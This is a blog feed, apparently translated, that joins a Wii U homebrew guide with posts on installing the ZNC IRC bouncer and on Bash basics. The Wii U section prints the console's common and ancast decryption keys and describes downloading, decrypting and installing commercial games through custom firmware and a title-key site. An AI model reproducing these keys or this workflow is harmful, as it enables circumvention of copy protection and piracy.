<td><img alt="" src="https://img.nlegall.fr/9Ss39rXC"></td>
<td>Mocha CFW</td>
<td>Unlocks the console firmware</td>
</tr>
<tr>
<td><img alt="" src="https://img.nlegall.fr/C7b6L6JA"></td>
<td>WUP installer y Mod</td>
<td>Installs games/updates/DLC on a USB drive</td>
</tr>
<tr>
<td></td>
<td>Wii U NAND Dumper</td>
<td>Dumps the console's NANDs</td>
</tr>
<tr>
<td></td>
<td>wuphax</td>
<td>Hacks vWii mode directly from the Wii U menu</td>
</tr>
</tbody>
</table>
<h1>Amiibo</h1>
<p>https://github.com/masterchan-777/TagMo - https://gbatemp.net/threads/shane9b3-s-amiibo-cards.465383/ https://imgur.com/a/NP2at/layout/horizontal#0</p>
<h1>Running games</h1>
<p>Games go in the <code>SD:/wiiu/games</code> folder, named as follows:</p>
<div class="highlight"><pre><span></span><code>WiiU Game's Title [TitleID6]/
Virtual console Game's Title [TitleID4]/
</code></pre></div>
<p>Example: <code>SD:/wiiu/games/Super Mario Maker [AMAE01]/</code></p>
<p>The TitleID can be found in the XML file among the game's files, or on http://www.gametdb.com/WiiU.</p>
<p>The full list of titles compatible with Loadiine is available at http://wiki.gbatemp.net/wiki/Loadiine_compatibility_list.</p>
<p>https://gbatemp.net/threads/list-of-web-hosts-for-homebrew-exploit.429943/
https://gbatemp.net/threads/the-definitive-vwii-hacking-guide.425852/</p>
<h1>FTP</h1>
<p>If you would rather not go through your computer to copy games onto the SD card, you can use an FTP server. Connect with FileZilla or any other FTP client to the IP address that XXXX displays when it starts.</p>
<p>You then have access to the whole SD card, so you can upload your game folder into <code>SD:/wiiu/games</code>.</p>
<h1>Getting the games</h1>
<h2>UWizard</h2>
<p><em>You need the 32-bit and 64-bit Visual C++ Redistributable Packages: https://www.microsoft.com/en-us/download/details.aspx?id=40784</em></p>
<p>https://github.com/MrMysterio/Uwizard</p>
<p>To decrypt the files fetched from Nintendo's CDN, you must add the three keys found in UWizard's options:</p>
<div class="highlight"><pre><span></span><code><span class="err">Wii U Common Key : D7B00402659BA2ABD2CB0DB27FA2B656</span>
<span class="err">Wii U Espresso Ancast Key : 805E6285CD487DE0FAFFAA65A6985E17</span>
<span class="err">Wii U Starbuck Ancast Key : B5D8AB06ED7F6CFC529F2CE1B4EA32FD</span>
</code></pre></div>
<p><img alt="" src="https://img.nlegall.fr/UkVLGuEl"></p>
<p>Once the keys are entered, you need the ID of the game you want. It can be found at http://wiiubrew.org/wiki/Title_database.</p>
<p><img alt="" src="https://img.nlegall.fr/4HKAxAS8"></p>
<p>You can tick the box to decrypt the files once the download finishes. You will also be asked for the ticket matching the game (with the right region: EUR, USA or JAP). They can be found at https://wiiu.titlekeys.com/.</p>
<p>You will then have the three folders containing the game's files. Copy them to the SD card in the form WiiU Game's Title [TitleID6].</p>
<h2>Wii U USB Helper</h2>
<p><em>http://application.wiiuusbhelper.com/Updater.exe</em></p>
<p>Probably one of the most polished game-management applications currently available. It can download games, DLC and updates, manage all of these games and copy them directly to an SD card.</p>
<p><img alt="" src="https://img.nlegall.fr/XMCePnnq"></p>
<p>A search with several filters is available, and several downloads can be run one after another (queue management).</p>
<h1>Games/DLC/Updates</h1>
<p><img alt="" src="https://i.imgur.com/kNxZFcI.png"></p>
<p>If you also want all the DLC for your game, you need a different procedure, since Loadiine does not support DLC (only updates). You will need a USB drive formatted on the Wii U to avoid any compatibility issues.</p>
<p>The games can be fetched with Wii U USB Helper, but they must not be unpacked/decrypted. Then copy the resulting folder into <code>SD:/install</code>.</p>
<p>You will need Mocha CFW. You can get it directly from the Homebrew App Store (https://github.com/vgmoose/hbas/releases) or by downloading the <code>.elf</code> directly from the GitHub repository: https://github.com/dimok789/mocha/releases. If you do not have wupinstaller, I recommend the modified version here: https://github.com/Yardape8000/wupinstaller/releases. It lets you install several folders at once by selecting them.</p>
<h2>Procedure</h2>
<ol>
<li>Launch the Homebrew Launcher via http://loadiine.ovh</li>
<li>Select Mocha CFW</li>
<li>Relaunch the Homebrew Launcher</li>
<li>Launch WUP Installer</li>
<li>Select the games to install on the USB drive</li>
<li>Done :D</li>
</ol>
<p>To run the games afterwards, repeat steps 1 and 2 so that the console allows games with updates and DLC.</p>
<h1>GameCube emulator</h1>ZNC2010-12-03T10:20:00+01:002010-12-03T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-12-03:/znc.html<p><img alt="" src="https://img.nlegall.fr/yT3qDTjk"></p>
<h1>How it works</h1>
<p>ZNC is an IRC bouncer.</p>
<p><img alt="" src="https://img.nlegall.fr/vwOYtNXh"></p>
<p>It connects to all the IRC servers and keeps the connection alive. This preserves all the messages exchanged while the user is disconnected. It also offers a whole set of options for managing these servers and channels.</p>
<h1>Installation</h1>
<div class="highlight"><pre><span></span><code>apt install build-essential libssl-dev libperl-dev pkg-config libicu-dev
wget http://znc.in/releases/znc-1.6.4.tar.gz
tar -xzvf znc-1.6.4.tar.gz
<span class="nb">cd</span> znc-1.6.4
./configure
make
make install
</code></pre></div>
<h1>Configuration</h1>
<p>Advice: enable SSL and do not add a network straight away; that can be done afterwards through the web interface.</p>
<div class="highlight"><pre><span></span><code>znc --makeconf
</code></pre></div>
<h1>Web interface</h1>
<p><img alt="" src="https://img.nlegall.fr/Khz8DRRw"></p>
<p>All of the configuration can then be done through the web interface:</p>
<ul>
<li>Adding networks with their respective channels</li>
<li>Creating users</li>
<li>Configuring the desired add-ons</li>
</ul>
<h1>Client</h1>
<p>In your IRC client, add a network as follows:</p>
<p><img alt="" src="https://img.nlegall.fr/SuWyT6eN"></p>Bash2010-11-24T10:20:00+01:002010-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2010-11-24:/bash.html<p><img alt="" src="https://img.nlegall.fr/1xRskUwR"></p>
<h2>Overview</h2>
<p>Bash (short for Bourne-Again shell) is a scriptable command-line interpreter. It is the Unix shell of the GNU project.</p>
<p>Based on the Bourne shell, Bash adds many improvements to it, drawn notably from the Korn shell and the C shell. Bash is free software released under the GNU General Public License. It is the default interpreter on many free Unix systems, notably GNU/Linux. It is also the default shell of Mac OS X and has been ported to Microsoft Windows by the Cygwin project.</p>
<h2>Integer comparison operators</h2>
<div class="highlight"><pre><span></span><code>-eq <span class="c1"># equal</span>
-ne <span class="c1"># not equal</span>
-gt <span class="c1"># greater than</span>
-ge <span class="c1"># greater than or equal</span>
-lt <span class="c1"># less than</span>
-le <span class="c1"># less than or equal</span>
</code></pre></div>
<h2>String comparison operators</h2>
<div class="highlight"><pre><span></span><code><span class="o">=</span> / <span class="o">==</span> <span class="c1"># equal</span>
!<span class="o">=</span> <span class="c1"># not equal</span>
&lt; <span class="c1"># less than (ASCII order); escape as \&lt; inside [ ], or it is parsed as a redirection</span>
&gt; <span class="c1"># greater than (ASCII order); escape as \&gt; inside [ ] for the same reason</span>
-z <span class="c1"># zero length (empty string)</span>
-n <span class="c1"># non-empty string</span>
</code></pre></div>
<h2>Strings</h2>
<h3>Extracting a column</h3>
<div class="highlight"><pre><span></span><code><span class="c1"># d -> delimiter</span>
<span class="c1"># f -> column to keep</span>
$ <span class="nb">echo</span> <span class="s2">"10:42:36"</span> <span class="p">|</span> cut -d <span class="s2">":"</span> -f <span class="m">2</span>
<span class="m">42</span>
</code></pre></div>
<h2>Time</h2>
<h3>Converting to seconds</h3>
<p><em>Seconds elapsed since 1 January 1970 00:00 UTC</em></p>
<div class="highlight"><pre><span></span><code><span class="k">$(</span>date -u -d <span class="s2">"</span><span class="nv">$TIME</span><span class="s2">"</span> +<span class="s2">"%s"</span><span class="k">)</span>
</code></pre></div>
<h3>Difference between two times</h3>
<div class="highlight"><pre><span></span><code><span class="k">$(</span>date -u -d <span class="s2">"0 </span><span class="nv">$CURRENT_S</span><span class="s2"> sec - </span><span class="nv">$TIME_S</span><span class="s2"> sec"</span> +<span class="s2">"%H:%M:%S"</span><span class="k">)</span>
</code></pre></div>
<h2>Conditional tests</h2>
<div class="highlight"><pre><span></span><code><span class="k">if</span> <span class="o">[</span> expression <span class="o">]</span>
<span class="k">then</span>
statement
<span class="k">elif</span> <span class="o">[</span> expression <span class="o">]</span>
<span class="k">then</span>
statement
<span class="k">else</span>
statement
<span class="k">fi</span>
</code></pre></div>
<h2>Running a command (command substitution)</h2>
<div class="highlight"><pre><span></span><code>result<span class="o">=</span><span class="k">$(</span>ls /tmp<span class="k">)</span>
</code></pre></div>
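<p>The two date snippets above, combined with the integer tests and command substitution from this page, as an added example that is not from the original notes: a small POSIX shell script (it relies on GNU date's <code>-d</code>, as the snippets do) that converts a timestamp to epoch seconds, computes an elapsed time with shell arithmetic rather than the <code>date -d "0 ... sec"</code> trick, which wraps around after 24 hours, and refuses a negative interval instead of formatting it as a bogus duration. Function names and sample timestamps are constructed.</p>

```shell
#!/bin/sh
# Added example (not from the original notes): the date snippets as functions,
# plus integer tests and command substitution. Uses GNU date's -d for parsing;
# the arithmetic and formatting are plain POSIX sh.

# to_epoch "YYYY-MM-DD HH:MM:SS" -> seconds since 1970-01-01 00:00 UTC.
# -u makes date read the input as UTC, so the result does not depend on
# the machine's timezone.
to_epoch() {
    date -u -d "$1" +%s
}

# fmt_hms SECONDS -> "HH:MM:SS" using shell arithmetic only. Unlike the
# `date -d "0 N sec"` trick, hours keep counting past 24.
fmt_hms() {
    total=$1
    h=$((total / 3600))
    m=$((total % 3600 / 60))
    s=$((total % 60))
    printf '%02d:%02d:%02d\n' "$h" "$m" "$s"
}

# elapsed_hms START END -> time between two timestamps as HH:MM:SS.
# Returns status 1 and prints nothing when END is before START, so a
# negative interval is never silently turned into a meaningless duration.
elapsed_hms() {
    start_s=$(to_epoch "$1")
    end_s=$(to_epoch "$2")
    if [ "$end_s" -lt "$start_s" ]; then
        return 1
    fi
    fmt_hms $((end_s - start_s))
}

# Demo with constructed timestamps.
elapsed_hms "2020-06-02 10:00:00" "2020-06-02 11:02:03"   # 01:02:03
fmt_hms 90061                                              # 25:01:01
if elapsed_hms "2020-06-02 12:00:00" "2020-06-02 11:00:00"; then
    echo "unexpected: negative interval accepted"
else
    echo "END before START rejected"
fi
```

<p>Quoting <code>"$end_s"</code> and <code>"$start_s"</code> inside <code>[ ]</code> matters: if <code>date</code> fails and a variable is empty, the unquoted form collapses to <code>[ -lt 0 ]</code>, which is a syntax error rather than a clean failure.</p>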